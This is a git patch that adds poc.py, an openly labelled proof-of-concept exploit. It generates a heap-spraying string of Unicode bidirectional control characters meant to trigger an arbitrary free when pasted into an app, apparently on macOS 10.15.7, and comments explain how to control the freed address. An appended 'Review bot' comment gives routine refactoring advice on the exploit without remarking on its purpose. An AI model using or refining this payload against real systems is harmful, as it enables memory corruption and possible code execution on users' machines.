From cb847c47696e38e080d3b9511d68a73a6741ae71 Mon Sep 17 00:00:00 2001
From: "spv.sh"
Date: Tue, 18 Apr 2023 12:30:16 -0400
Subject: ye olde source

---
 poc.py | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 poc.py

(limited to 'poc.py')

diff --git a/poc.py b/poc.py
new file mode 100644
index 0000000..581fbc9
--- /dev/null
+++ b/poc.py
@@ -0,0 +1,37 @@
+# python3 poc.py | pbcopy
+# paste into app
+# profit
+#
+# super stable PoC
+# works about 10% of the time if you're lucky
+#
+# should free 0x1515151515151515
+# it like sprays that in a similar location to the free list, and sometimes ends up freeing it
+# for a more controlled free you might have to find each of the 256 values (i haven't yet), and substitute them
+# example: 0x41 becomes 0x15, and 0xffff becomes 0x4
+# so if you spray "\x41\x41\uffff\x41\uffff\uffff\uffff\uffff" it'll spray 0x1515041504040404, maybe something else because endianess but fuck you, whatever
+# also there's like an offset of 0x2 or something
+# i add "\uffff\uffff" at the start which seems to pad it for the address to work right
+# it's vaguely functional, and should at least prove the bug exists
+# note: this may have been patched in some big sur version (or 11.0 itself)
+# run on 10.15.7, it's been tested there.
+
+import sys
+
+def lol(l2):
+    s = ""
+    a = ["\u202a", "\u202b", "\u202c", "\u202d", "\u202e", "\u202f"]
+    b = []
+    for i in a:
+        for j in a:
+            b += i + j
+    for i in range(l2):
+        s += b[i % (len(b))]
+        c = "\x41" * 0x8000
+        if i == 6:
+            s += c
+        else:
+            s += "\1"
+    return s
+
+print(lol(18))
--
cgit v1.2.3
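Review bot: The line `c = "\x41" * 0x8000` inside `lol` rebuilds the same 32 KiB string on every iteration of `for i in range(l2)` even though it never changes; hoist it above the loop (next to `a` and `b`) so it is allocated once. `import sys` is never referenced in the file and can be dropped. Building `s` with repeated `+=` is the quadratic string-concatenation pattern — appending the pieces to a list and finishing with `"".join(parts)` reads cleaner and does not depend on the CPython in-place optimisation. The header comment is the only place the tested platform (`10.15.7`) and the "may have been patched" caveat are recorded; a one-line docstring on `lol` stating what `l2` controls (the number of chunks emitted) would help a reader who lands on the function without the header.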